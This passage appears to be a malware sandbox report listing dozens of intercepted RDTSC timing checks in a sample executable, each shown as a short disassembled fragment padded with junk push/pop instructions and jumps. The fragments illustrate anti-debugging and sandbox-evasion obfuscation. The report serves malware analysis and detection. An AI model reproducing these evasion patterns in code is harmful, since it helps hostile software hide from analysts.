                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E658EC second address: E658F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E67A2E second address: E67A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E67A32 second address: E67A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F163h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E66B54 second address: E66B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39710h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E66B6C second address: E66B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E66B7A second address: E66B80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E68B25 second address: E68B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E68B2B second address: E68B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E67BC8 second address: E67BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E67BCC second address: E67BDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F4BA0D39706h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E70A53 second address: E70A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E70A58 second address: E70A5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E70E41 second address: E70E4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E75581 second address: E75587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7561F second address: E75623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7570B second address: E75750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F4BA0D39706h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F4BA0D39715h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F4BA0D39715h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E75750 second address: E75754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E75754 second address: E75758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A35D second address: E7A36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4BA0D3F156h 0x0000000a jnc 00007F4BA0D3F156h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A36E second address: E7A378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4BA0D39706h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A4AA second address: E7A4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4BA0D3F156h 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A632 second address: E7A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A638 second address: E7A653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D3F162h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A653 second address: E7A65D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A792 second address: E7A7A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A7A0 second address: E7A7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4BA0D3970Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A8E2 second address: E7A8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7AA92 second address: E7AA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7AA98 second address: E7AA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7ABD5 second address: E7ABF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D39719h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7ABF7 second address: E7ABFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7ABFD second address: E7AC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F4BA0D3971Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7AD90 second address: E7ADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7DF48 second address: E7DF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7DF4E second address: E7DF89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jns 00007F4BA0D3F156h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F4BA0D3F156h 0x0000001b jmp 00007F4BA0D3F15Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E14864 second address: E14868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E14868 second address: E14891 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F4BA0D3F15Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4BA0D3F163h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8342C second address: E83432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E83432 second address: E83453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F165h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F4BA0D3F156h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8202B second address: E8202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8202F second address: E82039 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E825DB second address: E825E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E825E1 second address: E825E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E82785 second address: E8278B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8278B second address: E82790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E82B91 second address: E82B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E82E80 second address: E82E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E362E6 second address: E36308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39719h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E0733D second address: E07353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E07353 second address: E07363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4BA0D39706h 0x0000000a jc 00007F4BA0D39706h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E88C95 second address: E88CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F4BA0D3F156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F4BA0D3F15Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E87AC6 second address: E87ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E87ACA second address: E87AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E87AD2 second address: E87AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E87C39 second address: E87C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E87C3F second address: E87C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E87C43 second address: E87C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F162h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8810C second address: E88112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E88568 second address: E8856E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E889CA second address: E889F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39715h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F4BA0D3970Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E889F3 second address: E889F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E889F8 second address: E88A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E88A05 second address: E88A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8E807 second address: E8E823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8D6CA second address: E8D6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F4BA0D3F15Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8D6EB second address: E8D6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E560E0 second address: E56114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 js 00007F4BA0D3F159h 0x0000000f movsx ecx, dx 0x00000012 lea eax, dword ptr [ebp+12481EB9h] 0x00000018 jnp 00007F4BA0D3F15Ch 0x0000001e mov dword ptr [ebp+1246F4C0h], edx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F4BA0D3F15Ah 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56114 second address: E56119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56119 second address: E56132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4BA0D3F156h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4BA0D3F158h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56132 second address: E56138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56138 second address: E5613C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5613C second address: E3576D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call dword ptr [ebp+122D1E3Bh] 0x0000000f jbe 00007F4BA0D3973Eh 0x00000015 jns 00007F4BA0D3972Eh 0x0000001b jne 00007F4BA0D3970Ah 0x00000021 jl 00007F4BA0D39748h 0x00000027 pushad 0x00000028 jmp 00007F4BA0D39719h 0x0000002d jbe 00007F4BA0D39706h 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 push edx 0x00000036 pop edx 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5678A second address: E56790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56790 second address: E56795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56795 second address: E567B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E567B3 second address: E567D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F4BA0D39713h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E567D8 second address: E567DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E567DC second address: E56867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007F4BA0D39718h 0x00000011 jbe 00007F4BA0D39712h 0x00000017 jmp 00007F4BA0D3970Ch 0x0000001c pop eax 0x0000001d or dword ptr [ebp+124553B2h], ebx 0x00000023 mov ecx, 3D0C8D29h 0x00000028 call 00007F4BA0D39709h 0x0000002d push eax 0x0000002e jnl 00007F4BA0D3970Ch 0x00000034 pop eax 0x00000035 push eax 0x00000036 jmp 00007F4BA0D39712h 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f push ebx 0x00000040 jmp 00007F4BA0D39713h 0x00000045 pop ebx 0x00000046 mov eax, dword ptr [eax] 0x00000048 push eax 0x00000049 push edx 0x0000004a jnp 00007F4BA0D39715h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56867 second address: E5686D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56B5D second address: E56B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56B63 second address: E56B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E570CF second address: E570D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5746B second address: E57480 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F4BA0D3F156h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E57480 second address: E574E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F4BA0D39708h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 pushad 0x00000023 mov bh, ch 0x00000025 mov ah, ECh 0x00000027 popad 0x00000028 lea eax, dword ptr [ebp+12481EFDh] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F4BA0D39708h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E574E6 second address: E574EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E574EB second address: E57587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4BA0D39715h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4BA0D39708h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+12481EB9h] 0x00000030 jmp 00007F4BA0D3970Ah 0x00000035 nop 0x00000036 pushad 0x00000037 jmp 00007F4BA0D39712h 0x0000003c pushad 0x0000003d jmp 00007F4BA0D39716h 0x00000042 jmp 00007F4BA0D39711h 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jo 00007F4BA0D39708h 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E57587 second address: E362E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007F4BA0D3F15Bh 0x00000028 call dword ptr [ebp+122D2947h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 jmp 00007F4BA0D3F15Ah 0x00000036 pop edi 0x00000037 jmp 00007F4BA0D3F169h 0x0000003c rdtsc
